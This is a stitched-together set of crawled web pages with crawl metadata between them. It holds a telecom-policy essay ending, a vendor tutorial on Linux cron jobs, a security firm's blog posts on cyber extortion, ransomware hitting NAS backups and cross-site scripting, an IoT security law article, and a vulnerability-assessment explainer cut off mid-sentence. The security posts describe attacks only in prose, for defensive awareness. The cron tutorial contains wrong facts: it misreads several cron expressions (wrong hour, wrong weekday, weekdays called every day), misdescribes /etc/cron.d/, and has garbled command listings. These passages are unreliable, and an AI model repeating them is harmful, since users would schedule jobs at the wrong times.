concern. China has already in recent years assumed a level of visionary global leadership and engagement in telecommunications venues once enjoyed by the U.S. Bully bilateralism as a replacement for international cooperation in the sector is also doomed to fail. Perhaps the ultimate message here from a hundred years ago is that stable means of global cooperation and vision on matters of fundamental importance for all people have compelling value and will ultimately prevail over the jingoism, self-serving incompetence, and demagoguery of transient national political figures.
<urn:uuid:e998d615-c5f4-4ec5-ab7b-7e84e47f5ff6>
CC-MAIN-2024-38
https://circleid.com/posts/20161211_will_harding_mistakes_in_international_telecom_coop_be_repeated
2024-09-09T15:15:55Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00012.warc.gz
en
0.966258
1,704
2.96875
3
Linux is a free, open source operating system known and loved by technical teams across the globe. This OS is extremely popular with developers of all experience levels and startup teams because it can be customized more than other operating systems and offers flexible setup depending on a team’s environment variables. Something teams of all sizes use Linux for is scheduling jobs and automating tasks. The most popular method for scheduling jobs in Linux is cron jobs. What is cron? Cron is a system process that automatically performs tasks based on a specific schedule. Getting its name from the Greek word “Chronos,” meaning time, cron refers to a set of commands used to run regular scheduled tasks. Cron is a job scheduling utility that exists in Unix-like systems. The cron deamon runs in the background to enable cron job scheduling functionality. There is a cron file for each user in the /etc/cron.d/ home directory, while the /etc/crontab file is system-wide. Every user manages their own scheduled jobs and cron configuration file, which could look something like this: $ sudo systemctl status crond ● crond.service - Command Scheduler Loaded: loaded (/usr/lib/systemd/system/crond.service; enabled; vendor preset: enabled) Active: active (running) since Fri 2022-11-11 15:13:12 -03; 1h 17min ago The above example is referenced from a Red Hat system administrator article. What is crontab? Cron reads the crontab to run predefined scripts. Crontab means “cron table” and uses the cron job scheduler to execute tasks. Crontab is also the name of the program that is used to edit the schedule of tasks. This program is driven by a crontab file, or configuration files, that directs shell commands to run on a specific time schedule. Using specific syntax allows users to configure a cron job to schedule scripts or other commands to run automatically. When writing out a crontab command for execution, use an asterisk to match any value, use hyphens to define a range (1-10 ; etc), and use commas to separate defined ranges like apr-june What are cron jobs? Any action that you schedule through cron is called a cron job. Cron jobs automate routine tasks to run at a scheduled time, and can be set to run by day of the week, day of the month, month of the year, weekday, etc. Linux Job Scheduling with Cron Using cronjobs in Linux has numerous benefits. This method enables teams to use the Linux operating system to schedule a backup of log files, delete old log files, archive and purge database tables, send email notifications, clear cached data, and automate Unix jobs and system maintenance. The Linux system pack already has a task scheduler named crontab which can be scheduled to run an automated process with root user permissions, making changes for a system administrator easier. Cron Job Syntax for Linux Task Scheduling To modify scheduled cron jobs, edit the crontab file or create files inside the crond home directory using necessary parameters. Crontabs use the following parameters for adding and listing cron jobs using the command line: : Edits crontab entries to add, delete, or modify cron jobs.crontab -l : List all cron jobs for the current user.crontab -u username -l : List another user’s crontab.crontab -u username -e : Edit another user’s crons. When listing crons, users will see a series of asterisks, like this example below: * * * * * sh /path/to/script.sh Each asterisk represents minutes, hours, days, months, or weekdays. sh indicates the shell cript is a bath script, and /path/to/script.sh specifies the path to script. Examples of Using Crontab to Schedule Tasks in Linux Some examples of scheduling cron jobs in Linux include: 0 8 * 8 * will schedule a task for 00:08 in August. 8 5 * * 6 will schedule a task for 05:08 on Sunday. 0 12 * * 1-5 will schedule a task every day of the week at 12:00. Linux Job Scheduling with ActiveBatch ActiveBatch is a workload automation and job scheduling tool that helps teams automate cross-platform IT and business processes. The Linux job scheduler features day and time scheduling options for scheduling tasks at specific times, including day of the week and day of the month. An integrated cron jobs library sets ActiveBatch’s Linux job scheduling solution apart, providing hundreds of pre-built job actions. Teams can use ActiveBatch to easily schedule tasks and cron jobs without needing a tutorial or managing complex configurations. With numerous extensions for popular web apps, teams can build and automate complex task scheduling workflows from a central system. ActiveBatch also makes it easy to connect to applications with API endpoints and perform command line functions. ActiveBatch’s Linux job scheduler enables teams to schedule tasks on the operating system of their choice including Windows, Linux, UNIX, and IBM iSeries AS/400, and integrate with other job schedulers, including cron jobs for added convenience. Cron job automation provides functionality like delivering notifications, writing to the event log file, and more. Teams can use default load balancing functionality to reduce wait times, and manage the provisioning of infrastructure resources. Frequently Asked Questions Cron is a time-based job scheduler in Unix-like operating systems, which allows you to run Linux commands or scripts at a specific time or interval. To schedule a daily job in Linux using cron, take the following steps: 1. Type the following command into your terminal to open the crontab configuration file: crontab -e. This will open your default text editor and deploy the crontab file. 2. In your text editor, add a new line for your daily job with the following syntax: * * * * * /path/to/command . This syntax represents the following time parameters in order: minute, hour, day of the month, month, and day of the week. The asterisk (*) character means “any” value, so this example will run the command every minute of every hour, every day of the month, every month, and every day of the week. 3. Replace path/to/command with the command or script you want to run. 4. Save and close the crontab with a Ctrl + X to confirm the changes. Learn more about using cron job software for workflow automation using ActiveBatch. While cron is typically already installed by default on most Linux machines, users can install cron through the following steps: 1. Open your preferred terminal window. 2. Update your package listing using the following command: sudo apt-get update This command is for Ubuntu or Debian based distributions. If you’re using a different distribution, you may need to use a different command or package manager. 3. Install cron using the following command: sudo apt-get install cron This command will install the cron package and any dependencies. 4. Once installation is complete, you can verify cron has been installed by running the following command: sudo systemctl status cron ActiveBatch’s workload automation tool offers dozens of tools to maintain and integrates shell scripts of any language. “ is a cron expression that defines a specific time for running a cron job. In a cron expression, there are five fields separated by spaces, each representing a unit of time. The five fields represent, in order: 1. Minute (0-59) 2. Hour (0-23) 3. Day of the month (1-31) 4. Month of the year (1-12 or Jan-Dec) 5. Day of the week (0-7 or Sun-Sat) ” character in each field means “any value“, so the expression: “* * * * * ” means “run the cron job every minute, every hour, every day of the month, every month of the year, and every day of the week”. Replace any or all of the asterisk characters with specific values to define a more precise schedule. For example, “0 4 * * * ” means “run the cron job at 4:00 AM every day“, while “0 0 1 * * ” means “run the cron job at midnight on the first day of every month.“ Automate and orchestrate diverse system processes using ActiveBatch’s cross-platform job scheduling software. Linux has a built-in scheduler called the Completely Fair Scheduler (CFS), which is responsible for managing and distributing CPU time among processes. The CFS is a process scheduler that provides fairness, low latency, and scalability to the Linux kernel. See how batch task scheduling with ActiveBatch can help you manage critical business and IT jobs. There are a number of Linux tools that can be used to schedule tasks. These include: ● Cron: Cron is a time-based scheduler in Linux that allows users to schedule tasks (commands or scripts) to run at specific intervals. Cron can be used to schedule tasks for day of week, weekly, day of month, month of year, or annual execution. ● At: At can be used to schedule one-time jobs to run at a specific time in Linux. Unlike Cron, At is designed to run a job only once on a specific time and date. systemd timers: Systemd is a system and service manager for the Linux operating system. Systemd timers provide a way to schedule tasks to run at a specific time, after a certain delay, or on a recurring schedule. ● Anacron: Anacron is used to run jobs that should be executed regularly, but not necessarily at a specific time. Anacron is designed to handle jobs that may not run due to system downtime or other issues requiring a reboot. The at command is considered one of the most useful for scheduling one-time jobs in Linux. The at package installs other binaries that are used in tandem with the main command. The package provides the atd daemon which is what users will interact with using the at and atq commands. Compare Linux job scheduling with Windows job scheduling using ActiveBatch solutions.
<urn:uuid:92da350a-2e72-4b7c-aea9-7af89bc8453e>
CC-MAIN-2024-38
https://www.advsyscon.com/blog/linux-job-scheduling/
2024-09-09T15:10:55Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00012.warc.gz
en
0.871616
2,266
3.421875
3
Thought leadership. Threat analysis. Cybersecurity news and alerts. Valuable Lessons from Recent Cyber ExtortionsThe recent data breach at LifeLabs, which affected nearly half of Canada’s population, and the recent data breach at the City of Pensacola highlight the growing danger of cyber extortions. What Is Cyber Extortion?Extortion – the act of using threats to gain something from someone – has been given a new form in the cyber world. In the case of the data breach at LifeLabs, cybercriminals gained access to the company’s computer systems, stole data and thereafter demanded ransom payment from the company in exchange for the stolen data. In a joint statement, the Office of the Information and Privacy Commissioner of Ontario and the Office of the Information and Privacy Commissioner for British Columbia said, “LifeLabs advised our offices that cyber criminals penetrated the company's systems, extracting data and demanding a ransom.” "Retrieving the data by making a payment," said Charles Brown, President and CEO of LifeLabs, was one of the several measures taken by the company to protect customer information. The recent cyber extortion at the City of Pensacola, meanwhile, involved a headline-grabbing method: ransomware – a malicious software (malware) that encrypts computer files, locks out users and demands from victims ransom payment in exchange for the decryption keys that would unlock the encrypted files. The group behind the ransomware called “Maze” claimed responsibility for the ransomware attack at the City of Pensacola. The group demanded that the City pay $1 million ransom to decrypt the encrypted files. Ten percent or 2GB of the data stolen before encrypting the computer files of the City was recently published online by the group behind Maze ransomware. When asked by BleepingComputer if the group intends to release the rest of the stolen data, the group said, "It depends". The group behind Maze ransomware similarly published online 10% or 700 MB of data stolen from another victim, the Allied Universal after the victim failed to pay the group’s demand of 300 bitcoins then valued at nearly $2.3 million. The group told BleepingComputer that the rest of the stolen data will be leaked online if the increased ransom of $3.8 million won’t be paid. How Cyber Extortion Works?How the attackers penetrated the LifeLabs’ computer systems, how the data was extracted data and how the ransom demand was made haven’t been made public. For Maze ransomware, however, there’s a handful of data online. Security researcher Jérôme Segura first observed in May of this year Maze ransomware in the wild initially infecting victims’ computers via the Fallout exploit kit through a fake cryptocurrency exchange site. Fallout exploit kit exploits the security vulnerabilities in Microsoft Windows and Adobe Flash Player. In October of this year, security researcher JAMESWT observed Maze ransomware infecting victims in Italy through a phishing campaign that tricks victims into opening the attached document in an email pretending to be from the Italian Revenue Agency. Researchers from Cisco Talos reported that they’ve also observed Maze ransomware in the wild. In a Maze ransomeware attack, the researchers said that after obtaining access to a network, CobaltStrike is used. CobaltStrike is a commercial penetration testing tool that markets itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike uses well-known tools, including Mimikatz – a tool that’s capable of obtaining plaintext Windows account logins and passwords. According to Cisco Talos researchers, once the adversary behind Maze ransomware has access to the victim’s network, at least a week is spent moving around the network and gathering data along the way. The researchers added that the gathered data is extracted by using “PowerShell to dump large amounts of data via FTP out of the network”. After data extraction, Maze ransomware is then deployed on the compromised computers, the researchers at Cisco Talos said. The researchers at Cisco Talos added that the observed Maze ransomware attacks also involved interactive logins via Windows Remote Desktop Protocol and remote PowerShell execution achieved via Windows Management Instrumentation Command-Line (WMIC). In its 2020 Threats Predictions Report, McAfee Labs said that for 2020, it predicts that targeted penetration of corporate networks will continue to grow and ultimately give way to two-stage extortion attacks, with the first stage of attack involving a crippling ransomware attack and the second stage of attack involving the threat to disclose the data stolen before the ransomware attack. Preventive and Mitigating Measures Against Cyber ExtortionWhile having a working backup system is still a must to protect your organization’s sensitive data, as shown in the recent cyber extortions, brushing off cyber-attacks through better backup systems will prove to be not enough in 2020 as attackers are aiming for data theft and leveraging this stolen data to get what they want. Here are some of the preventive and mitigating measures against cyber extortion: - Keep All Software Up to Date Keeping all your organization’s software up to date stops attackers at their tracks as the latest software security updates typically fix security vulnerabilities. - Apply the Principle of Least Privilege The principle of least privilege promotes minimal user privileges on computers based on user’s job necessities. For instance, if the user’s work isn’t IT-related, his or her computer access shouldn’t allow administrative rights, referring to the right to install software, change the operating systems configuration settings and other higher-level access. - Disable Windows Remote Desktop Protocol (RDP) There have been many document cases whereby Windows Remote Desktop Protocol (RDP) had been used by attackers as a gateway to their victims’ networks. It’s advisable to disable RDP when this service isn’t used. - Keep Backups Offline Over the past few months, attackers have specifically targeted backup systems. It’s advisable to keep your organization’s backup systems offline. Cyber extortions has become a new norm and many organizations have already fell victim. Connect with our team of cybersecurity experts today to understand you weakest links better and mitigate the risk of cyber extortion. LifeLabs Reveals It Paid Ransom in Exchange for Stolen DataLifeLabs, the largest provider of general diagnostic and specialty laboratory testing services in Canada, has announced that it paid an undisclosed amount of ransom in exchange for the stolen data of 15 million customers. Charles Brown, President and CEO of LifeLabs, in a statement, said that the company’s computer systems were illegally accessed resulting in the theft of data belonging to approximately 15 million customers. Stolen data includes name, address, email, login, passwords, date of birth and health card number. The vast majority of the affected customers are from Ontario and British Columbia. Brown added that laboratory test results of 85,000 customers from Ontario for the period 2016 or earlier were part of the stolen data. The President and CEO of LifeLabs further said that health card information of customers for the period of 2016 or earlier was also stolen. "Retrieving the data by making a payment,” Brown said was one of the measures that the company took in order to protect customer information. “Personally, I want to say I am sorry that this happened,” he said. While the President and CEO of LifeLabs said that risk to customers in connection with this cyber attack is “low and that they have not seen any public disclosure of customer data,” he called on affected customers to avail of the company’s one free year of protection that includes dark web monitoring and identity theft insurance. How the LifeLabs Data Breach Unfolded?The President and CEO of LifeLabs said that the data breach was discovered as a result of "proactive surveillance” and added that the company “fixed the system issues” related to the cyber-attack. In a joint statement, the Office of the Information and Privacy Commissioner of Ontario (IPC) and the Office of the Information and Privacy Commissioner for British Columbia (OIPC) said that LifeLabsinformed the two offices on November 1, 2019 about the data breach. The IPC and OIPC said that they will conduct a joint investigation into the data breach at LifeLabs. Among the things to be investigated, the two offices said, will include the scope of the breach and the circumstances leading to it. “They advised us that cyber criminals penetrated the company's systems, extracting data and demanding a ransom,” IPC and OIPC said in a joint statement. “LifeLabs paid the ransom to secure the data.” "An attack of this scale is extremely troubling,” said Brian Beamish, Information and Privacy Commissioner of Ontario. “I know it will be very distressing to those who may have been affected. This should serve as a reminder to all institutions, large and small, to be vigilant." “I am deeply concerned about this matter,” said Michael McEvoy, Information, and Privacy Commissioner for British Columbia. “The breach of sensitive personal health information can be devastating to those who are affected." While ransom or payment was made, there was no mention that the attack was due to a ransomware – a type of malicious software (malware) that encrypts data and the group or individual behind the malware then demands ransom payment in exchange for decryption key or keys that would unlock the encrypted files. Cyber Attackers New Modus OperandiWhile cyber attackers have been known to steal data from their victims, there’s a scarcity of information showing victims paying ransom in order to get back the stolen data. The latest cyber incident at LifeLabs shows an alarming cyber-attack trend, that is, penetrating the victim's systems, extracting data and then demanding a ransom. Ransomware attackers, meanwhile, over the past few weeks have openly employed a new tactic in order to force their victims to pay ransom: threatening ransomware victims that failure to pay the ransom will result in the publication of stolen data. This latest modus operandi by ransomware attackers confirms what has been widely known in the cyber security community that ransomware attackers don’t merely encrypt data but they also have ways to snoop and even steal data prior to the data encryption. In late November of this year, the group behind the ransomware called “Maze” published online the stolen data from one of its victims, Allied Universal after Allied failed to pay 300 bitcoins, then valued nearly $2.3 million USD, within the period set by the malicious group. The group behind the Maze ransomware told BleepingComputer, “We gave them time to think until this day, but it seems they [Allied Universal] abandoned payment process.” The group behind the Maze ransomware further said that before encrypting any of the victims’ files, these files are first exfiltrated or stolen to serve as further leverage for the victims to pay the ransom. The group behind the ransomware called “REvil”, also known as Sodinokibi ransomware, recently announced in a hacker forum that it will also leak online the stolen data from ransomware victims who refuse to pay ransom. Other than leaking the stolen data online, the group behind REvil ransomware also said the stolen data from ransomware victims who refuse to pay could be sold. Maze ransomware initially infects victims’ computers via phishing campaigns or via Fallout exploit kit – a hacking tool that exploits the security vulnerabilities in Adobe Flash Player and Microsoft Windows. REvil ransomware, meanwhile, also initially infects victims’ computers via phishing campaigns and exploit kits, as well as by exploiting a security vulnerability in Oracle’s WebLogic server and by brute-forcing Remote Desktop Protocol (RDP) access. Ransomware Attacks Now Targeting Your BackupsBackups have traditionally been regarded as the last line of defence against ransomware attacks. Over the past few months, however, backups have been specifically targeted by ransomware attacks. In the "IT threat evolution Q3 2019" report, Kaspersky researchers found that ransomware attacks on backups, specifically NAS backups, are gaining ground. What Is NAS?NAS, short for network attached storage, is a storage and backup system that consists of one or more hard drives. This storage and backup system can be connected to home or office network or the internet. In case a NAS device is connected to the internet, data stored on this device can be accessed using a web browser or mobile app. Ransomware Targeting NASResearchers at Anomali in July of this year reported about eCh0raix, a ransomware that specifically targets QNAP network attached storage (NAS) devices. According to the researchers, the source code of eCh0raix has less than 400 lines, with functionalities that are typical to a ransomware, including checking if data in the infected system has already been encrypted, going through the file system for files to encrypt, encrypting the files, and producing the ransom note. Researchers at Anomali noted that eCh0raix ransomware isn’t designed for mass distribution as the samples with a hardcoded public key appear to be compiled for the target with a unique key for each target.QNAP Systems, the manufacturer of QNAP network attached storage (NAS) devices, for its part, acknowledged that QNAP devices using weak passwords and outdated QTS firmware are vulnerable to eCh0raixransomware. In July of this year, another NAS device manufacturer Synologyreported that several of Synology NAS devices were under ransomware attacks as a result of brute-forcing administrator login details. In a brute-force attack, a malicious actor submits a number of passwords in the hope of eventually guessing the correct one. According to Synology, its investigation related to the ransomware attacks found that the attacks were due to dictionary attacks – the use of words in the dictionary in brute-forcing login details – instead of specific system vulnerabilities. Synology added that the large-scale ransomware attacks were targeted at various NAS models from different NAS vendors. Ken Lee, Manager of Security Incident Response Team at Synology, said that NAS attackers used “botnet addresses to hide their real source IP”. Just last month, another NAS device manufacturer D-Linkacknowledged that the following D-Link network attached storage (NAS) models are vulnerable to a different ransomware called “Cr1ptT0r” ransomware: DNS-320 Ax/Bx, DNS-325, DNS-320L, DNS-327L, DNS-323 Ax/Bx/Cx, DNS-345, DNS-343 and DNS-340L. According to D-Link, Cr1ptT0r encrypts stored information and then demands payment to decrypt the information. According to Kaspersky researchers, the growing ransomware attacks on NAS devices involve attackers scanning the internet for internet-connected NAS devices. Kaspersky researchers said that a number of NAS devices have vulnerabilities in the firmware, which enables attackers via an exploit to install on the compromised device a Trojan – a type of malicious software (malware) that’s often disguised as legitimate software – that encrypts all data on the NAS device. “This is a particularly dangerous attack, since in many cases the NAS is used to store backups, and such devices are generally perceived by their owners as a reliable means of storage, and the mere possibility of an infection can come as a shock,” Kaspersky researchers said. Preventive and Mitigating MeasuresHere are some of the preventive and mitigating measures against ransomware attacks targeting NAS backups: Manufacturers of NAS devices, QNAP Systems, Synology and D-Link, asked users to apply the latest software or firmware version. In the case of D-Link NAS devices, D-Link said that DNS-320 Ax/Bx, DNS-323 Ax/Bx, DNS-325 Ax and DNS-345 Ax have passed their end of service date, which means that these models are no longer supported by the company through customer support and no longer receive software or firmware updates. For the said models that have passed their end of service date, D-Link asked users to "remove the Internet access of NAS on your router by disabling the port forwarding and DMZ setting". One thing is common to these NAS ransomware attacks: They victimized only those devices that are connected to the internet. To protect backups from this type of ransomware, it’s important to disable internet connection to these devices. Generally, an internet-connected NAS device can only be accessed via a web or mobile app interface and this interface is protected by an authentication page, where a user has to authenticate oneself before logging in. As acknowledged by NAS manufacturers, some users use weak passwords, making it easy for attackers to brute-force or guess the passwords. When there’s a need for these NAS devices to be accessible via the internet, it’s important to use strong passwords and, if possible, to use multi-factor authentication to add another layer of defence. Here are some of the additional defences to protect backups from ransomware attacks: As shown in the number of ransomware attacks in recent months, this type of cyber-attack doesn’t seem to slow down. Organizations that have shown to be financially capable of paying ransom, including government agencies, as well as organizations in the healthcare and education sectors are particularly targeted by this attack. You don’t have to be a victim of a ransomware attack. Stop cybercriminals before they get the leverage. Speak with our cybersecurity experts today and stop worrying about ransomware. Cross-Site Scripting: Still One of the Biggest Cyber ThreatsCross-site scripting, also known as XSS, is one of the most dangerous software errors that threatens websites and applications, even the likes of Gmail. Security researcher Michał Bentkowski of Securitum recently discovered a cross-site scripting vulnerability in Gmail’s AMP4Email, also known as “dynamic email”. Launched in July 2019, Gmail’s dynamic email allows users to take action directly from within the message itself, such as RSVP to an event, filling out a questionnaire or browsinga catalog. Allowing dynamic content in Gmail, Google knows it opens itself to security vulnerabilities such as cross-site scripting – a security vulnerability that allows malicious actors to add malicious code into trusted websites or applications. While Google takes a number of precautionary measures against cross-site scripting, Bentkowski discovered that Gmail’s dynamic email didn’t block the specific code HTML id attribute, thereby opening the email service vulnerable to cross-site scripting. Bentkowski said he reported the cross-site scripting vulnerability to Google on August 15, 2019. According to Bentkowski, Google replied that “the bug is awesome, thanks for reporting”. Bentkowski added that on October 12, 2019, he received a confirmation from Google that the bug was fixed. What Is Cross-Site Scripting?Cross-site scripting vulnerability is so widespread that it’s ranked second in the 2019 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Errors. According to CWE, which is sponsored by the U.S. Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA), ranking for the top most dangerous software errors is based on the data from Common Vulnerabilities and Exposures (CVE) data and data from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). The NVD data, in particular, covered the period from the years 2017 and 2018, which consisted of nearly 25,000 CVEs. Based on the NVD count, out of the 25,000 CVEs for the years covered, 3,430 CVEs were cross-site scripting vulnerabilities. Cross-site scripting is a security vulnerability found in web pages or applications that accept user input. This includes login page, check-out page and, in the case of the Gmail case, Gmail’s AMP4Email or dynamic email. While users typically place legitimate inputs such as usernames and passwords in login pages, credit card details in check-out pages or RSVP to an event in the case of Gmail’s dynamic email, these fields that accept user input could be exploited by malicious actors, giving them opportunity to insert malicious code into an otherwise trusted website or application. In the case of Gmail’s dynamic email, there’s no report that malicious actors were able to exploit the said cross-site scripting vulnerability. Security engineers at Microsoft were the first ones to coin the term cross-site scripting back in December 1999. In December 2009, in commemorating the 10th year anniversary of coining the word, security engineers at Microsoft, in the blog post “Happy 10th birthday Cross-Site Scripting!”, wrote, “Let's hope that ten years from now we'll be celebrating the death, not the birth, of Cross-Site Scripting!” As shown in the latest ranking in the most dangerous software errors, cross-site scripting appears to be far from dead. Microsoft itself recently patch a cross-site scripting vulnerability on its Microsoft Outlook for Android software. The company said that the cross-site scripting vulnerability allows an attacker to “run scripts in the security context of the current user”. MagecartCross-site scripting has recently been put back into the headlines by Magecart – the umbrella term given to cybercriminal groups that steal credit card details from unsecured payment forms on websites. Magecart has been linked to the data breach at British Airways and the recent data breach at Macy’s. Researchers at RiskIQ reported that Magecart breached British Airways baggage claim information page by just inserting 22 lines of code, enabling the attackers to grab personal and financial details entered by customers and sent the data stolen to the server controlled by the attackers. A security researcher, meanwhile, who wishes to remain anonymous, told BleepingComputer that the recent data breach at Macy's website was caused by the alteration of https://www[dot]macys[dot]com/js/min/common/util/ClientSideErrorLog[dot]js script, enabling the attackers to grab data entered by customers in the company’s website, in particular, checkout page and wallet page. Preventive and Mitigating Measures Against Cross-Site ScriptingAttempts in the past have been made to stop cross-site scripting. One such attempt was XSS Auditor, a feature added to Google Chrome v4 in 2010. XSS Auditor aims to detect XSS vulnerabilities while the browser is processing the code of websites. It uses a blocklist to identify suspicious code. In July of this year, Google security engineer Thomas Sepez announced the retirement of XSS Auditor. Google senior security engineer Eduardo Vela Nava first proposed the retirement of XSS Auditor in October 2018. “We haven't found any evidence the XSSAuditor stops any XSS, and instead we have been experiencing difficulty explaining to developers at scale, why they should fix the bugs even when the browser says the attack was stopped,” Nava said. “In the past 3 months, we surveyed all internal XSS bugs that triggered the XSSAuditor and were able to find bypasses to all of them.” As shown in the above examples, cross-site scripting vulnerability is a menace to websites and applications. This holiday season – the time of the year when online shopping and other transactions are at its peak, it’s important to sanitize your organization’s website and applications to protect it from cross-site scripting. When you need to protect your website and web applications against XSS and other common attacks, our team of experts is a phone call away and ready to protect your web applications in just minutes. Under denial of service attack with ransom demands? Don’t pay! We will stop the DDoS attacks in a few minutes, for good. Call today (888) 900-3749 or connect with us online. | AuthorSteve E. Driz, I.S.P., ITCP Archives
<urn:uuid:2e160caa-fbbf-4d5d-a5f5-fdc6dc448e16>
CC-MAIN-2024-38
https://www.drizgroup.com/driz_group_blog/archives/12-2019
2024-09-11T22:55:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00712.warc.gz
en
0.941333
4,974
3.171875
3
Cybersecurity made it through Capitol Hill! After its long, long journey to Washington D.C., the Internet of Things Cybersecurity Improvement Act has finally become a law. (Throwback to School House Rock, anyone?) On Dec. 4, the president signed new legislation to mandate security requirements for internet-connected devices and smart sensors purchased by the federal government. This new law will require the National Institute of Standards and Technology (NIST) and the Office of Management and Budget (OMB) to create and review standards for connected devices which have long been plagued by security and privacy issues. As we know, setting a minimum security standard for all connected devices purchased by government agencies is no easy feat. But what does all of this mean for government agencies deploying IoT devices? What’s the big deal? According to Sen. Gardner, co-chair of the Senate Cybersecurity Caucus, “Most experts expect tens of billions of devices [to be] operating on our networks within the next several years as the Internet of Things (IoT) landscape continues to expand.” Now more than ever, our world is reliant on digital devices, expanding the potential attack surface. By establishing a clear minimum standard for connected devices for government use, the government will be able to confidently work with contracted manufacturers knowing their data and information will be secure. Here are some existing challenges with IoT device security that government entities are currently facing: - Malware: Although malware has existed for many years, the rapid growth in the number of IoT devices and the insecure deployment of such devices has made it easier for cybercriminals to infiltrate government agencies through malicious code. For example, in Sept. 2016, Mirai, a botnet code, infected millions of routers and CCTV cameras through compromised devices. This led to an attack against DNS provider Dyn, causing many services to go offline. - Insecure Wi-Fi Connection: While the focus is often on the IoT device itself, vulnerable Wi-Fi connections are just as, if not more, dangerous. As government agencies have been spread thin during the pandemic, many devices have been used on insecure home networks, leaving agencies more vulnerable to attacks. - Unsegmented Networks: When multiple devices are connected over a single, unsegmented network, access to one device can mean access to all. Rather than segmenting a network to separate computers, printers, and other computing and IoT devices, some agencies use a single, unsegmented network that leaves them vulnerable to malware and other attacks through a single source. Challenges associated with IoT devices will only continue to increase through insecure connections and devices. With cybersecurity standards here to regulate challenges facing our connected world, essential infrastructure may experience a huge facelift in the security arena. After almost three years, the federal government has taken a huge step forward for cybersecurity – and we hope it doesn’t stop here. Carolina Advanced Digital offers consulting, services, and products for managing IoT security including wireless security, network hardening, Zero Trust Networking, NAC and other dynamic segmentation solutions as well as SOC-as-a-Service and managed security solutions. Most of our solutions are available on convenient procurement contracts such as NASA SEWP V, GSA, and state contracts. For federal buyers, we’re also HUBZone and SDVOSB certified. Contact us today to schedule a call and discuss your needs!
<urn:uuid:d9f79fd6-b158-4646-9321-9ef41c426ca9>
CC-MAIN-2024-38
https://cadinc.com/cybersecurity-for-all-how-the-iot-cybersecurity-improvement-act-will-impact-government-entities/
2024-09-13T05:00:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00612.warc.gz
en
0.944782
699
2.8125
3
Vulnerability Assessments: 4 Crucial Steps for Identifying Vulnerabilities in your Business There are times when security professionals will need to assess the vulnerability of their systems, especially when evaluating the results of automated reports. In addition to the revealed information, vulnerability assessments will provide excellent opportunities for a strategic viewpoint for potential security threats. On this page: What is a Vulnerability Assessment? A core part of your technology risk management strategy, a vulnerability evaluation or assessment, is a mechanism for identifying security flaws within information systems. It determines if and how a system is exposed to known threats and designate severity levels accordingly. - Concentrated evaluations of the adequacy and execution of technical, operational, and management security controls - Makes a concerted effort to discover all vulnerabilities in the systems and components - Contributes to risk management - Full knowledge and assistance of systems administrators - No harm to systems It will also make recommendations for actions that can be taken to mitigate the threats if possible. The types of threats that these evaluations cover include: - Faulty authentication which comes from increasing authorizations - Insecure defaults resulting from software that is released with settings that are not secure - Code-based injection attacks such as XSS or SQL Types of Assessments A vulnerability assessment is an examination of vulnerabilities in IT systems at a certain point in time with the goal of detecting system flaws before hackers may exploit them. Security assessments come in four types: application scans, network or wireless assessment, database assessment, and host assessment. - Application scans – These scans identify security gaps within web-based applications as well as the source code. It is automated and conducted either dynamic/static or front end - Network or wireless assessment- This involves evaluating practices and policies to stop unauthorized access into public or private networks and resources that are network accessible - Database Assessment – The evaluation of large data systems or databases is undertaken to identify misconfigurations and flaws, including rogue databases and test/dev environments that are insecure, and will classify any data deemed sensitive over the entire infrastructure - Host assessment – This involves a review of critical servers which might be susceptible to attack should they not be sufficiently tested or generated from a machine image Setting the scope for Vulnerability Evaluations There is a difference between presuming you’re exposed to a cyberattack and understanding exactly how vulnerable you are. The purpose of vulnerability assessment is to close this gap. A vulnerability assessment examines some or all of your systems and creates a comprehensive vulnerability report. This report can then be used to address the issues discovered to avoid security breaches. Assessments of vulnerability may contain the following components: - External Vulnerability Assessment — Identifies external vulnerabilities. - Internal Vulnerability Assessment — Identifies internal network vulnerabilities. - Social Engineering – Identifies human resource weaknesses and training shortfalls. - Physical Security Assessments – Identifies physical security weaknesses. Vulnerability Assessment vs Penetration Testing Vulnerability assessments detect vulnerabilities but do not attempt to exploit them. Numerous vulnerability assessments use a scanning programme that ranks the vulnerabilities, allowing security experts to prioritize which ones to fix first. Penetration testing is a distinct type of security testing that begins with a vulnerability assessment and employs human testers to exploit flaws to acquire unauthorized system access. Organizations use penetration testing to mimic the amount of harm an attacker could cause if they fully exploited vulnerabilities. Vulnerability assessments, which are generally automated, can be used with penetration testing to provide frequent insight between penetration examinations. VULNERABILITY ASSESSMENTS | PENETRATION TESTING | Uncover known vulnerabilities across the environment | Identify and exploit vulnerabilities to demonstrate how criminals might use them to move laterally or deeper into the environment. | Broad – scanning the surface | Focused, deep | PERFORMED BY | Automated tool(s) with human oversight | Experience hackers, cyber security professionals | List of vulnerabilities | A prioritized collection of vulnerabilities, exploitable techniques, narrative walkthroughs of attack scenarios, and advice for repair | NEXT STEP | Prioritize remediation and patching | Apply patches and other security updates that significantly minimize risk. | BEST FOR | Obtaining an overview of an organizations security posture | Understand all facets of an organizations security posture | Performing a Vulnerability Evaluation Furthermore, a rising number of businesses rely on technology to carry out their everyday operations. Yet, cyber dangers, such as ransomware, can bring your firm to a standstill in an instant. It is widely recognized that prevention is better than cure, resulting in the increased importance of cybersecurity and a desire for solutions to ensure its resilience. More SaaS customers, for example, now want frequent vulnerability assessments, and having proof of security testing can help you generate more revenue. Security scanning can be broken down into four steps: analysis, testing, assessment, and remediation. - Identification – The goal here is to locate the root cause and source for the vulnerability. System components must be reviewed individually, as the source of the exposure might be something like an older version for a library that is open source. In this instance, upgrading your library would resolve the issue. - Analysis – The purpose of the analysis is to formulate a list of vulnerabilities for the application. Security experts will review application health, including servers and other systems, using automated tools to scan them. These experts might also use security databases, exploits announced by vendors, threat-based intelligence feeds, and management asset systems. - Assessment – Assessment is used to prioritize the vulnerabilities. Severity scores will need to be assigned to each exposure. These scores will be dependent on the specific affected systems, the type of vulnerable data, the endangered business functions, and how easily attacks can be 